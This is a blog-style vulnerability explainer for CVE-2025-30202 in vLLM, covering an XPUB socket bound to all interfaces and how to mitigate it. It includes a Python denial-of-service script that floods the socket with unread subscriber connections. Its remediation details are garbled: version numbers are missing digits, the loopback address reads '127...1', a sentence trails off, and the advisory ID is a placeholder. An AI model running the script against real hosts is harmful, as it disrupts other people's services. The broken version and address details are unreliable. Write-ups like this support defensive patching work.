CVE-2025-30202 - vLLM Exposed — Denial of Service and Data Leakage via ZeroMQ XPUB Socket

vLLM is a popular, high-speed inference and serving engine built for Large Language Models. It's known for its performance and efficiency in powering modern AI applications. But recently, a serious vulnerability has been revealed affecting vLLM versions from .5.2 up to—but not including—.8.5. In this post, I’ll break down what happened, what it means for users, and how you can protect yourself.

What is the Issue?

The problem centers around how vLLM handles inter-node communication when running across multiple hosts. Specifically, vLLM opens a ZeroMQ XPUB socket and binds it to all network interfaces, making it accessible to anyone on the network unless strict firewall rules are in place.

In multi-node setups, vLLM uses ZeroMQ for coordination—especially for tensor parallelism.

- The primary vLLM node binds an XPUB socket (ZeroMQ's "publisher socket" for broadcast messaging) to all interfaces: tcp://*:PORT.
- Any client on the reachable network can connect to this socket if the firewall doesn't block the port.
- Clients connected receive all messages intended for secondary vLLM hosts (these are internal state/status updates).
- While the leaked data itself isn’t directly valuable, a malicious client could connect repeatedly and not read data, causing the publisher to back up, slow down, or even crash—a classic Denial of Service (DoS) vector.

Let's look at a typical vulnerable code pattern, simplified for clarity

import zmq

ctx = zmq.Context()
socket = ctx.socket(zmq.XPUB)
socket.bind("tcp://*:5559")  # Listen on all network interfaces

This line socket.bind('tcp://*:5559') exposes the XPUB socket to the entire network.

There are two major risks with this bug

1. Data Leakage: Any network client could receive vLLM’s internal broadcast traffic. Thankfully, this is mostly low-value as it’s not user or model data, but it still increases attack surface.
2. Denial of Service (DoS): By opening several connections to the exposed socket and not reading any data, an attacker can force the ZeroMQ socket to queue up unsent messages, eventually causing resource exhaustion and crashing the publisher.

Here’s how a simple DoS exploit might look, using Python and ZeroMQ

# attacker_dos.py
import zmq
import time

for i in range(100):  # Open many connections to the XPUB socket
    ctx = zmq.Context()
    sock = ctx.socket(zmq.SUB)
    sock.connect("tcp://victim.server.ip:5559")
    sock.setsockopt(zmq.SUBSCRIBE, b"")  # Subscribe to everything but don’t read

print("Many sockets are now blocking the publisher...")
time.sleep(999999)  # Hold connections open

How to Fix (and What the Patch Did)

The vLLM team resolved the issue in version .8.5. The patch ensures that the XPUB socket is either:

Check your firewalls: Explicitly block the XPUB port from untrusted networks.

- Limit bind addresses: Prefer tcp://127...1:PORT or an internal interface rather than *.

Reference

- GitHub Security Advisory: GHSA-gxxx-xxxx-xxxx
- CVE Entry at Mitre (pending publication)
- ZeroMQ XPUB documentation

Bottom Line

If you deploy vLLM across multiple nodes—or operate any internal service using ZeroMQ—take this as a wake-up call. Default network settings can create real risks. Always patch early and review how your services are exposed to the network.

Timeline

Published on: 04/30/2025 01:15:51 UTC
Last modified on: 05/14/2025 19:59:42 UTC